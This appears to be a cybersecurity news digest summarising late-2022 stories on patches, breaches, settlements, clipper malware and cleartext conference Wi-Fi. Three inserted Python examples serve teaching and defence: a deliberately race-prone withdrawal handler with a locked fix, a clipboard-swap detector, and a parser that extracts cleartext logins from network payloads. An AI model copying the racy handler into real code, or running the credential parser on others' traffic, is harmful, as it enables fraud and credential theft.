    Censinet, a healthcare risk management solutions provider, has announced plans to conduct "The Healthcare Cybersecurity Benchmarking Study" with the American Hospital Association (AHA) and KLAS Research. The study is enrolling hospital and health system participants, with the goal of evaluating key operational cyber metrics and cyber maturity as well as coverage of the National Institute of Standards and Technology Cybersecurity Framework (NIST CSF) and the Health Industry Cybersecurity Practices (HICP). The anonymized and aggregated data sets will provide participating healthcare organizations with benchmarking data and insight into key cybersecurity metrics across the sector. With cyber risk now posing a significant enterprise risk to hospitals and health systems, now is the time to strengthen the industry's cyber strength, maturity, and resilience, according to John Riggi, the AHA's national advisor for cybersecurity and risk. The Healthcare Cybersecurity Benchmarking Study gathers experts to achieve this goal and help all providers reduce enterprise risk and protect patient safety. Participants will also have access to Censinet's NIST CSF and HICP benchmarking modules until March 2023, as well as guidance to address critical security gaps and specific benchmarks that organizations can use for resource allocation. Several health system sponsors, including Mass General Brigham, Intermountain Healthcare, Cedars-Sinai, Baptist Health, Dayton Children's, Fairview Health Services, Hartford HealthCare, and Marshfield Clinic Health System, are leading efforts to promote the study. According to Censinet CEO and founder Ed Gaudet, the Healthcare Cybersecurity Benchmarking Study is the first healthcare benchmarking initiative to combine key organizational indicators, NIST CSF, and HICP in support of comprehensive provider self-evaluation and peer comparison. This article continues to discuss the goals of the Healthcare Cybersecurity Benchmarking Study.

    HealthITSecurity reports "Censinet, AHA, KLAS Partner On Healthcare Cybersecurity Benchmarking Study"

  • news

    Visible to the public "ICS Patch Tuesday: Siemens Addresses Critical Vulnerabilities"

    Siemens and Schneider Electric have recently released their Patch Tuesday advisories for November 2022. Siemens has released nine new security advisories covering a total of 30 vulnerabilities, while Schneider has published only one new advisory. Of Siemens' nine advisories, three describe vulnerabilities rated "critical." Four vulnerabilities, one of high severity and three critical, have been found in Sicam Q100 power meter devices; Siemens noted that they can allow an attacker to hijack user sessions, crash the device, or execute arbitrary code. Another Siemens advisory covers more than a dozen vulnerabilities in Scalance W1750D devices, including many rated "critical," that could allow an attacker to execute arbitrary code or cause a denial-of-service (DoS) condition. Patches are not available, but the vendor has provided some mitigations. The last Siemens advisory addressing a critical vulnerability describes a weak key protection issue in Sinumerik products; the same issue was addressed last month in Simatic products. Another Siemens advisory notes that high-severity vulnerabilities have been patched in Teamcenter Visualization and JT2Go (DoS and remote code execution), Parasolid (remote code execution), and QMS Automotive (credentials exposure). Medium-severity flaws have also been found in Ruggedcom ROS devices, industrial controllers, and the Sinec network management system. Schneider Electric's single new advisory covers three vulnerabilities that expose its NetBotz security and environmental monitors to cross-site scripting (XSS), account takeover, and clickjacking attacks. The French industrial giant has released patches.

    SecurityWeek reports: "ICS Patch Tuesday: Siemens Addresses Critical Vulnerabilities"

  • news

    Visible to the public "APIs Are Everywhere, but API Security Is Lacking"

    As Application Programming Interfaces (APIs) spread across corporate infrastructure, they are quickly becoming the largest attack surface in applications and a major target for attackers. According to industry experts, the rise of increasingly integrated web and mobile-based offerings that require data sharing across multiple companies' products, together with the dependence of mobile apps on APIs, has fueled this growth and made API security one of the most difficult challenges for CIOs. A 2022 survey conducted by 451 Research revealed that 41 percent of respondent organizations experienced an API security incident in the last 12 months, and 63 percent of respondent organizations said the incident involved a data breach or data loss. According to a GigaOm research report, API security products were generally developed before API use expanded to today's level and were based on the idea that requiring developers to secure the code they write invites failure. GigaOm also noted that developers do not intentionally write insecure code, so if they inadvertently write code with vulnerabilities, it is most likely because they are unaware of the weaknesses an API may have. Once API security was deployed, however, Information Technology (IT) teams quickly discovered another reason to use a security product: some vulnerabilities are far easier to block in the network than in each and every application. According to the GigaOm report, the idea that it is more effective to block some attacks in the network, which includes data centers, cloud vendors, and Software-as-a-Service (SaaS) providers, has fueled demand for products capable of doing this. APIs make up 91 percent of all web traffic, and they fit the trend toward microservice architectures and the need to respond dynamically to rapidly changing market conditions. Yet APIs have given rise to a completely new class of cybersecurity threats that specifically target them as a primary attack vector. The volume and severity of Web API traffic and attacks are increasing. More than half of APIs are invisible to business IT and security teams, and these unknown, unmanaged, and unsecured APIs expose critical business logic vulnerabilities and increase risk to organizations. This article continues to discuss the need to bolster API security.

    VB reports "APIs Are Everywhere, but API Security Is Lacking"

  • news

    Visible to the public "Google Patches High-Severity Privilege Escalation Vulnerabilities in Android"

    Android's November 2022 security updates patch over 40 vulnerabilities, including multiple high-severity escalation of privilege bugs. The first part of the update includes fixes for 17 security defects, 12 of which could lead to escalation of privilege (EoP), three to denial of service (DoS), and two to information disclosure. All of these are high-severity vulnerabilities impacting Android 10 and newer releases. Google noted that except for one bug, all of them impact Android 13 as well. Google stated that the most severe of these issues is a vulnerability in the Framework component that could lead to local escalation of privilege with no additional execution privileges needed. Google also mentions two additional vulnerabilities addressed as part of the Google Play system updates, namely CVE-2022-2209 (impacting Media framework components) and CVE-2022-20463 (impacting Wi-Fi). The second part of this month's Android security update resolves 26 additional issues (one critical and 25 high-severity flaws) in Imagination Technologies, MediaTek, Unisoc, and Qualcomm components. Google noted that Android devices running a security patch level of 2022-11-05 or later have been patched against all these vulnerabilities. Google stated that an additional set of five issues were resolved with the November 2022 Pixel security updates. These include two high-severity bugs in the Titan M chip and three medium-severity flaws in Qualcomm closed-source components.

    SecurityWeek reports: "Google Patches High-Severity Privilege Escalation Vulnerabilities in Android"

  • news

    Visible to the public "ThriveDX Partners with the University of Chicago to Offer Cybersecurity Bootcamps"

    ThriveDX, a global cybersecurity and digital skills training and cyber talent development company, has announced a new partnership with the University of Chicago to provide cybersecurity bootcamp training in the Chicago area. The 400-hour training program will give participants the essential skills and real-world experience needed to pursue a career in cybersecurity. ThriveDX collaborates with academic institutions, businesses, and governments around the world to provide professional development programs in cybersecurity and digital technology. The University of Chicago's Cybersecurity Bootcamp, powered by ThriveDX, is intended to meet the growing demand for cybersecurity professionals in the greater Chicago area and will give learners in the region who want to move into the cybersecurity and digital skills workforce access to accelerated learning opportunities. According to a recent Fortinet cybersecurity skills gap study, 80 percent of organizations worldwide experienced one or more breaches that could be attributed to a lack of cybersecurity skills or awareness. The survey also found that organizations struggle to find and retain certified cybersecurity talent, and that a lack of qualified candidates creates additional risk for them. Learners will be introduced to a comprehensive curriculum covering cybersecurity fundamentals through virtual, instructor-led lessons as well as experiential, hands-on learning; the program is divided into an introductory and an extended course. By the end of the introductory course, students will understand what the extended cybersecurity program covers, allowing them to decide whether it fits their career goals. The extended program's courses are divided into three sections: Cybersecurity Fundamentals, Cybersecurity Infrastructure, and Advanced Cybersecurity. One distinctive element of the program is TDX Arena, ThriveDX's proprietary online experiential learning platform, on which learners complete simulations of real-world hacking scenarios. This article continues to discuss the partnership between ThriveDX and the University of Chicago to offer cybersecurity bootcamps and the cybersecurity workforce gap.

    GlobeNewswire reports "ThriveDX Partners with the University of Chicago to Offer Cybersecurity Bootcamps"

  • news

    Visible to the public "US States Announce $16M Settlement With Experian, T-Mobile Over Data Breaches"

    Recently, authorities in 40 US states reached a settlement totaling more than $16 million with Experian and T-Mobile over data breaches suffered by the companies in 2012 and 2015. The multi-state settlement with Experian totals more than $13.67 million, and the settlement with T-Mobile is for $2.5 million. In addition, each company has agreed to take steps to improve its data security practices. The attorneys general in several states published press releases announcing how much they will each receive from these settlements: Hawaii, for instance, is getting roughly $180,000, Massachusetts will receive over $625,000, New Jersey $500,000, Pennsylvania $460,000, Michigan $360,000, and Nebraska $140,000. The settlement is related to two cybersecurity incidents. As part of the settlement, Experian will need to implement a comprehensive information security program and take other steps to prevent such incidents from occurring in the future. Experian will also be required to offer impacted consumers five years of free credit monitoring services. As for T-Mobile, the company must strengthen third-party oversight to ensure that vendors handling its customers' data can protect the sensitive information they are entrusted with.

    SecurityWeek reports: "US States Announce $16M Settlement With Experian, T-Mobile Over Data Breaches"

  • news

    Visible to the public "COLUMN: Test and Verify That Cybersecurity Products Can Protect Critical Infrastructure"

    Vergle Gipson, Senior Advisor for the Idaho National Laboratory's (INL) Cybercore Integration Center, recently testified before the House Homeland Security Subcommittee on Cybersecurity, Infrastructure Protection, and Innovation. He concluded that Operational Technology (OT) systems in the US are more vulnerable to malicious cyberattacks than Information Technology (IT) systems, which is concerning given that much of the world's critical infrastructure has been the target of cyberattacks. Globally, there have been many attempted cyberattacks on grids and utilities, many of them successful, using phishing and ransomware. Cyberattacks on critical infrastructure are cited as a top concern in the World Economic Forum's Global Risks Report, and according to the Forum, attacks on critical infrastructure have become the new normal in sectors such as energy, healthcare, and transportation. Among critical infrastructures, the energy sector stands out as particularly vulnerable; power plants, utilities, nuclear plants, and the grid are all part of the energy ecosystem. Protecting critical Industrial Control Systems (ICS), OT, and IT systems from cybersecurity threats is difficult because each has its own operational frameworks, access points, and mix of legacy and emerging technologies. The column argues that hardware-implemented cybersecurity is required in critical infrastructure OT to ensure safety in the face of an ever-increasing threat landscape, and that penetration testing is the best way to determine whether OT is secure. The Israel Electric Corporation (IEC), Israel's largest supplier of electrical power, recently began penetration testing potential vendors' products to determine how well they are protected from breaches. IEC cannot afford to deploy security technologies that fail to meet mission specifications because it builds, maintains, and operates power generation stations, substations, and transmission and distribution networks. This is especially important given that Israel's critical infrastructure is constantly under attack, and vulnerabilities in hardware products attached to critical infrastructure could present a major threat if discovered and exploited by adversaries. This article continues to discuss the threat of cyberattacks to critical infrastructure and the mitigation of hardware risk through comprehensive penetration testing.

    HSToday reports "COLUMN: Test and Verify That Cybersecurity Products Can Protect Critical Infrastructure"

  • news

    Visible to the public "Cyberattack Causes Disruptions at Canadian Meat Giant Maple Leaf Foods"

    Canadian meat giant Maple Leaf Foods has recently confirmed that it is experiencing an outage after falling victim to a cyberattack. Maple Leaf Foods has more than 14,000 employees and has a market presence in Canada, the US, and Asia, offering products under several brands, including Maple Leaf, Schneiders, Mina, Greenfield Natural Meat Co., Lightlife, and Field Roast. Over the weekend, the company fell victim to a cyberattack that resulted in system disruptions. The company noted that upon learning of the incident, they took immediate action and engaged cybersecurity and recovery experts. The company said that it has executed business continuity plans and that work is underway to restore the impacted systems. However, the company expects further operational and service disruptions, saying that restoration efforts take time. The company has not provided specific details on the cyberattack, but the outage and the prolonged restoration efforts could mean the company was the victim of a ransomware attack.

    SecurityWeek reports: "Cyberattack Causes Disruptions at Canadian Meat Giant Maple Leaf Foods"

  • news

    Visible to the public "DOJ Says It Seized Billions in Bitcoin Stolen by Hacker From Silk Road Darknet Marketplace"

    The US Department of Justice (DOJ) has announced the seizure of more than 50,000 Bitcoin from James Zhong, a hacker who pleaded guilty to wire fraud in connection with the now-defunct Silk Road darknet marketplace. It is the largest cryptocurrency seizure in the DOJ's history. According to the DOJ and the Internal Revenue Service (IRS), the 32-year-old stole the Bitcoin from Silk Road in September 2012; the funds were seized in November 2021 during a raid on Zhong's home in Gainesville, Georgia. US Attorney Damian Williams said the whereabouts of this massive chunk of missing Bitcoin had ballooned into a $3.3 billion mystery for nearly ten years, and that law enforcement was able to locate and recover the cache of crime proceeds through cutting-edge cryptocurrency tracing and old-fashioned police work. Court documents reveal that Zhong stole the funds by finding a way around Silk Road's withdrawal processes. From 2011 to 2013, the marketplace was used to trade illegal goods worldwide; Ross Ulbricht, the platform's founder, was sentenced to life in prison in 2015. While the marketplace was open, Zhong set up nine accounts and executed more than 140 transactions in quick succession to trick Silk Road's withdrawal-processing system into releasing funds from its Bitcoin-based payment system. To conceal his identity, he transferred the Bitcoin into several different accounts. Zhong never used the platform to list or buy anything illegal, instead only funding the fraudulent accounts with initial deposits ranging from 200 to 2,000 Bitcoin. This article continues to discuss the DOJ's seizure of cryptocurrency stolen by a hacker from the now-defunct Silk Road darknet marketplace.

    The Record reports "DOJ Says It Seized Billions in Bitcoin Stolen by Hacker From Silk Road Darknet Marketplace"
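
The filings describe the theft only as a burst of rapid withdrawals that tricked the marketplace's withdrawal processing; they do not publish the code. The block below is an added example, not the page's or Silk Road's code, and assumes the classic check-then-act race that such a description implies: the handler reads the balance, the debit happens in a later step, and every request that passes the check before the first debit lands gets paid. `Account`, `NaiveWithdrawal`, `AtomicWithdrawal` and `burst` are hypothetical names; a `Barrier` forces the interleaving so the race reproduces on every run instead of depending on scheduler luck.

```python
import threading


class Account:
    """Ledger state shared by every concurrent withdrawal request (hypothetical)."""

    def __init__(self, start):
        self.start = start
        self.debits = []  # list.append is atomic under the GIL, so the only
                          # race that remains is the one inside the handler

    @property
    def balance(self):
        return self.start - sum(self.debits)


class NaiveWithdrawal:
    """Check-then-act: the balance test and the debit are separate steps."""

    def __init__(self, account):
        self.account = account

    def withdraw(self, amount, after_check=lambda: None):
        approved = self.account.balance >= amount   # check
        after_check()                               # other requests may run here
        if approved:
            self.account.debits.append(amount)      # act, on a stale check
        return approved


class AtomicWithdrawal:
    """Check and debit under one lock: no request can observe the balance
    between the test and the debit, so at most balance // amount succeed."""

    def __init__(self, account):
        self.account = account
        self.lock = threading.Lock()

    def withdraw(self, amount, after_check=lambda: None):
        with self.lock:
            approved = self.account.balance >= amount
            if approved:
                self.account.debits.append(amount)
        after_check()   # hook stays outside the critical section
        return approved


def burst(handler_cls, start, requests, amount):
    """Fire `requests` withdrawals of `amount` concurrently against a balance
    of `start`. The Barrier parks every request right after its balance
    check, so the interleaving an attacker races for happens every time.
    Returns (number of approved withdrawals, final balance)."""
    account = Account(start)
    handler = handler_cls(account)
    barrier = threading.Barrier(requests)
    results = []

    def worker():
        results.append(handler.withdraw(amount, after_check=barrier.wait))

    threads = [threading.Thread(target=worker) for _ in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), account.balance


if __name__ == "__main__":
    print("naive :", burst(NaiveWithdrawal, start=100, requests=5, amount=100))
    print("atomic:", burst(AtomicWithdrawal, start=100, requests=5, amount=100))
```

With a balance of 100 and five simultaneous requests for 100, the naive handler approves all five and leaves the ledger at -400; the locked handler approves one. In a real service the lock is usually a database-level construct (a row lock or a conditional `UPDATE ... WHERE balance >= amount` whose affected-row count decides approval), but the property to preserve is the same: the balance check and the debit must be one indivisible step.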

  • news

    Visible to the public "New Laplas Clipper Malware Targeting Cryptocurrency Users via SmokeLoader"

    A new clipper malware strain called Laplas is being delivered through another malware known as SmokeLoader to target cryptocurrency users. According to a Cyble analysis, SmokeLoader, which arrives via weaponized documents attached to spear-phishing emails, also acts as a conduit for other commodity Trojans such as SystemBC and Raccoon Stealer 2.0. SmokeLoader, seen in the wild since around 2013, functions as a generic loader capable of distributing additional payloads, such as information-stealing malware and other implants, onto compromised systems; in July 2022 it was observed deploying a backdoor known as Amadey. Since October 24, 2022, Cyble has discovered over 180 Laplas samples, indicating widespread deployment. Clippers, also known as ClipBankers, are a type of malware that Microsoft classifies as cryware. They steal cryptocurrency by monitoring the victim's clipboard and, when a wallet address is present, replacing it with an attacker-controlled address, so that a transaction intended for a legitimate recipient is redirected to the threat actor's wallet. According to the researchers, what sets Laplas apart is that it generates a replacement wallet address that resembles the victim's intended address, so the victim is unlikely to notice the difference, which increases the likelihood of a successful swap. The malware supports wallets for Bitcoin, Ethereum, Bitcoin Cash, Litecoin, Dogecoin, Monero, Ripple, Zcash, Dash, Ronin, TRON, Cardano, Cosmos, Tezos, and Qtum, as well as Steam Trade URLs. It is priced from $59 per month to $549 per year and comes with its own web panel, which lets purchasers see the number of infected machines and the active wallet addresses operated by the adversary, and add new wallet addresses. This article continues to discuss the new Laplas clipper malware strain.

    THN reports "New Laplas Clipper Malware Targeting Cryptocurrency Users via SmokeLoader"
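
The item explains the swap but not how a defender would spot it. The block below is an added example, not Cyble's analysis code or anything from the malware: a clipboard-history heuristic that flags the trace a look-alike clipper leaves behind, namely one address replaced within a fraction of a second by a different address of the same family that keeps the original's leading and trailing characters (the part most people eyeball). The address patterns are simplified, the clipboard log and the look-alike address are constructed (`ORIGINAL` is the BIP173 example address), and the time window and `min_shared` thresholds are assumptions. A well-formed replacement passes every checksum, so the check below compares the two strings against each other rather than trusting the shape of either.

```python
import os
import re

# Address shapes a clipper watches for (simplified; enough for the heuristic).
ADDRESS_PATTERNS = {
    "btc": re.compile(r"^(bc1[a-z0-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def address_type(text):
    """Return the coin family `text` looks like, or None."""
    text = text.strip()
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return name
    return None


def shared_ends(a, b):
    """Lengths of the common prefix and common suffix of two strings."""
    prefix = len(os.path.commonprefix([a, b]))
    suffix = len(os.path.commonprefix([a[::-1], b[::-1]]))
    return prefix, suffix


def detect_swaps(clipboard_log, window=1.0, min_shared=4):
    """Flag clipboard writes where one address is replaced, within `window`
    seconds, by a different address of the same family that shares at least
    `min_shared` leading and trailing characters. Returns one dict per hit."""
    hits = []
    for (t_prev, prev), (t_cur, cur) in zip(clipboard_log, clipboard_log[1:]):
        kind = address_type(prev)
        if kind is None or address_type(cur) != kind or prev == cur:
            continue
        if t_cur - t_prev > window:
            continue        # a slow change is the user copying something else
        prefix, suffix = shared_ends(prev, cur)
        if prefix >= min_shared and suffix >= min_shared:
            hits.append({"t": t_cur, "family": kind, "original": prev,
                         "replacement": cur, "shared": (prefix, suffix)})
    return hits


# Constructed clipboard history as (seconds, content). ORIGINAL is the BIP173
# example address; LOOKALIKE is made up to share its first 8 and last 5 chars.
ORIGINAL = "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq"
LOOKALIKE = "bc1qar0s" + "yl7k2p9x4h3qd5m8n6wv0zcsj9ut2" + "f5mdq"
CLIPBOARD_LOG = [
    (0.00, "meeting notes"),
    (12.40, ORIGINAL),          # user copies the recipient address
    (12.47, LOOKALIKE),         # 70 ms later the clipboard changes on its own
    (60.00, "0x" + "ab" * 20),  # user copies one ETH address ...
    (95.00, "0x" + "cd" * 20),  # ... and a different one 35 s later: benign
]

if __name__ == "__main__":
    for hit in detect_swaps(CLIPBOARD_LOG):
        print(hit)
```

Run against the constructed log, `detect_swaps` reports the Bitcoin swap (8 shared leading and 5 shared trailing characters) and ignores the two unrelated Ethereum copies. A wallet or browser extension can apply `shared_ends` to the intended recipient and the pasted value in the same way; the only reliable user-side defense remains comparing every character or confirming the address out of band, not glancing at the ends.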

  • news

    Visible to the public "Unencrypted Traffic Still Undermining Wi-Fi Security"

    The RSA Conference 2022 showed that even cybersecurity professionals must improve their security posture. The Cisco and NetWitness Security Operations Center (SOC) at the conference captured 55,525 cleartext passwords from 2,210 unique accounts. In one SOC investigation, a chief information security officer had a misconfigured email client that sent passwords and message text in the clear. While the number of cleartext passwords is down from 96,361 in 2020 and more than 100,000 in 2019, there is still room for improvement, according to Jessica Bair Oppenheimer, director of technical alliances at Cisco Secure. The RSA Conference 2022 Security Operations Center Findings Report provides insight into network usage among a security-conscious user group. Cisco and NetWitness both stressed that the wireless network at the RSA Conference is configured not to be secure but to be monitored for educational purposes. As a result, the network has a flat architecture, allowing any device on the network to communicate with any other device. Host isolation, which lets devices reach the Internet but not other devices on the network, would be more secure but less suited to that purpose. The 2022 conference had roughly half the number of attendees as the previous conference in 2020, but approximately the same number of network users, according to the report. The main problem was that encryption was not used for the authentication step when using email and other popular applications. According to the report, nearly 20 percent of all data passed through the network in the clear. This article continues to discuss key findings from the RSA Conference 2022 Security Operations Center Findings Report.

    Dark Reading reports "Unencrypted Traffic Still Undermining Wi-Fi Security"
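
The report counts credentials that crossed the conference Wi-Fi unencrypted because mail and web clients still authenticate in the clear when told to. The block below is an added example, not code from the report, Cisco or NetWitness: it applies the checks a SOC sensor would run over reassembled TCP payloads, recognising IMAP `LOGIN`, POP3 `USER`/`PASS`, SMTP `AUTH PLAIN` and HTTP Basic, and records only the username and the password length so the finding can be shared without re-exposing the secret. All five streams are constructed samples, not conference traffic; the connection strings, names and function names are assumptions.

```python
import base64
import re

# Constructed application-layer payloads, the way a SOC sensor reassembles
# them from unencrypted TCP streams (not traffic from the conference).
SAMPLE_STREAMS = [
    ("10.0.0.7:51234 -> 203.0.113.10:143",
     "a001 LOGIN alice@example.com Winter2022!\r\n"),
    ("10.0.0.9:51900 -> 203.0.113.11:110",
     "USER bob\r\nPASS hunter2\r\n"),
    ("10.0.0.12:52010 -> 203.0.113.12:587",
     "EHLO laptop\r\nAUTH PLAIN "
     + base64.b64encode(b"\x00carol\x00s3cret").decode() + "\r\n"),
    ("10.0.0.15:52300 -> 203.0.113.13:80",
     "GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
     + base64.b64encode(b"dave:letmein").decode() + "\r\n\r\n"),
    ("10.0.0.20:52400 -> 203.0.113.14:443",
     "\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"),  # TLS ClientHello: opaque
]


def _b64(token):
    """Strict base64 decode; None when the token is not base64 at all."""
    try:
        return base64.b64decode(token, validate=True)
    except ValueError:   # binascii.Error is a ValueError subclass
        return None


def find_cleartext_logins(payload):
    """Return (protocol, username, password_length) for every credential sent
    in the clear in `payload`. The password itself is never returned."""
    found = []
    m = re.search(r"^\S+ LOGIN (\S+) (\S+)", payload, re.M | re.I)
    if m:                                        # IMAP: tag LOGIN user pass
        found.append(("imap", m.group(1), len(m.group(2))))
    user = re.search(r"^USER (\S+)", payload, re.M)
    pw = re.search(r"^PASS (\S+)", payload, re.M)
    if user and pw:                              # POP3 two-step login
        found.append(("pop3", user.group(1), len(pw.group(1))))
    m = re.search(r"^AUTH PLAIN (\S+)", payload, re.M | re.I)
    raw = _b64(m.group(1)) if m else None
    if raw and raw.count(b"\x00") == 2:          # SASL PLAIN: authzid NUL authcid NUL passwd
        _, authcid, passwd = raw.split(b"\x00")
        found.append(("smtp", authcid.decode(errors="replace"), len(passwd)))
    m = re.search(r"^Authorization: Basic (\S+)", payload, re.M | re.I)
    raw = _b64(m.group(1)) if m else None
    if raw and b":" in raw:                      # HTTP Basic: user:pass
        user_b, passwd = raw.split(b":", 1)
        found.append(("http-basic", user_b.decode(errors="replace"), len(passwd)))
    return found


def audit(streams):
    """Run the detector over (connection, payload) pairs; one row per hit."""
    return [(conn, proto, user, pw_len)
            for conn, payload in streams
            for proto, user, pw_len in find_cleartext_logins(payload)]


if __name__ == "__main__":
    for row in audit(SAMPLE_STREAMS):
        print(row)
```

Against the constructed streams the audit yields four rows, one per plaintext protocol, and nothing for the TLS connection, which is the point: the same four clients would have produced no findings had they been configured for IMAPS, POP3S, submission with STARTTLS before `AUTH`, and HTTPS. Note that base64 is encoding, not encryption; `AUTH PLAIN` and Basic credentials are as exposed as the IMAP login that spells its password out.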

  • news

    Visible to the public "Malicious Droppers on Google Play Deliver Banking Malware to Victims"

    To reduce the risk of downloading malware, Android users are often told to install mobile apps only from Google Play, the company's official app marketplace, where Google examines apps before releasing them to the public. However, malware distributors continue to find ways around the vetting process. Distribution via droppers on official app stores is still one of the most effective ways for threat actors to reach a large and unsuspecting audience. While other distribution methods are used depending on the cybercriminals' targets, resources, and motivation, droppers remain one of the best options on a price-to-effort-to-quality ratio, competing with SMiShing, according to ThreatFabric researchers, who recently shared their discovery of several apps on Google Play functioning as droppers for the Sharkbot and Vultur banking Trojans. These trojanized but functional apps, typically file managers, file recovery tools, or two-factor authentication (2FA) apps, are designed to hide their malicious nature from Google Play Protect, antivirus software, researchers, and users: they provide the advertised functionality, ask for a few common permissions that are not suspicious, and contain no overtly malicious code. Cleafy researchers recently shared additional information about the evasion techniques of a Vultur Trojan dropper found in three Google Play apps: RecoverFiles, My Finances Tracker, and Zetter Authenticator. This dropper is constantly being improved by the cybercrime team behind the Brunhilda Dropper-as-a-Service (DaaS). The most recent version has a small footprint, requires few permissions, and hides from emulators, sandboxes, and security solutions through steganography, file deletion, string obfuscation, and anti-emulation techniques. According to ThreatFabric researchers, the Sharkbot dropper requests an even smaller set of common permissions and then refrains from any malicious activity if the user is not in a specific geographic location. This article continues to discuss the malicious droppers found on Google Play delivering banking malware to victims.

    Help Net Security reports "Malicious Droppers on Google Play Deliver Banking Malware to Victims"